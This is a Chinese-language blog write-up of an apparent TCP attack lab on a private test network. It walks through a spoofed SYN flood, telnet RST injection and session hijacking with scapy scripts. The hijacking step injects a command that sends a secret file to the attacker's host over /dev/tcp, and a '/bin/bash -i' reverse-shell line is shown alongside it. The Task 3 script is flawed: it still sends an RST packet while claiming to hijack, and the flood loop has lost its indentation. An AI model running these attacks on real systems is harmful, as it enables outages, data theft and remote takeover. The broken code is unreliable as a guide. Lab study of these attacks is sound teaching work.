目錄
- 啟動環境
- Task 1.1: Launching the Attack Using Python
- Task 1.2: Launch the Attack Using C
- Task 2: TCP RST Attacks on telnet Connections
- Task 3: TCP Session Hijacking
- Task 4: Creating Reverse Shell using TCP Session Hijacking
啟動環境
Task 1.1: Launching the Attack Using Python
攻擊前先查看狀態
netstat -tna
#!/bin/env python3
from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbits
ip = IP(dst="10.9.0.5")
tcp = TCP(dport=23, flags='S')
pkt = ip/tcp
while True:
pkt[IP].src = str(IPv4Address(getrandbits(32))) # source iP
pkt[TCP].sport = getrandbits(16) # source port
pkt[TCP].seq = getrandbits(32) # sequence number
send(pkt, verbose = 0)
讓攻擊持續至少一分鐘,然后試著進入受害者的機器,看看你是否能成功,你的攻擊很可能會失敗,這里進入victim的主機,發現很多半連接
Task 1.2: Launch the Attack Using C
Task 2: TCP RST Attacks on telnet Connections
進入10.9.0.6 telnet 10.9.0.7,并用wireshark抓包
抓包根據7給6的資料,更改py檔案如下
#!/usr/bin/env python3
from scapy.all import *
ip = IP(src="10.9.0.6", dst="10.9.0.7")
tcp = TCP(sport=36030, dport=23, flags="R", seq=1574683417, ack=2506752736)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)
發現連接到7的connection斷了
Task 3: TCP Session Hijacking
修改代碼,添加data(隨便一個16進制
#!/usr/bin/env python3
from scapy.all import *
ip = IP(src="10.9.0.6", dst="10.9.0.7")
tcp = TCP(sport=36074, dport=23, flags="R", seq=2758682726, ack=3314205569)
data="68656c6c6f20776f726c64"
pkt = ip/tcp/data
ls(pkt)
send(pkt,verbose=0)
Task 4: Creating Reverse Shell using TCP Session Hijacking
攻擊機:10.9.0.7
nc -lv 9090
在攻擊機開啟監聽
受害機:10.9.0.5
cat /home/seed/secret> /dev/tcp/10.9.0.7/9090
$ /bin/bash -i > /dev/tcp/10.9.0.7/9090 0<&1 2>&1
并在10.9.0.6telnet 10.9.0.5,抓包,得到引數如下
#!/usr/bin/env python3
from scapy.all import *
print("SENDING SESSION HIJACKING PACKET.........")
IPLayer = IP(src="10.9.0.6", dst="10.9.0.5")
# 6給5的 tcp資料包的引數
TCPLayer = TCP(sport=48852, dport=23, flags="A", seq=3017821363, ack=2102281185)
Data = "\r cat /home/seed/secret > /dev/tcp/10.9.0.7/9090\r"
pkt = IPLayer/TCPLayer/Data
ls(pkt)
send(pkt,verbose=0)
# Transmission Control Protocol, Src Port: 48852, Dst Port: 23, Seq: 3017821363, Ack: 2102281185, Len: 0
攻擊者獲得shell,能夠在受害服務器上執行命令
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/356089.html
標籤:其他
下一篇:計算機網路——網路層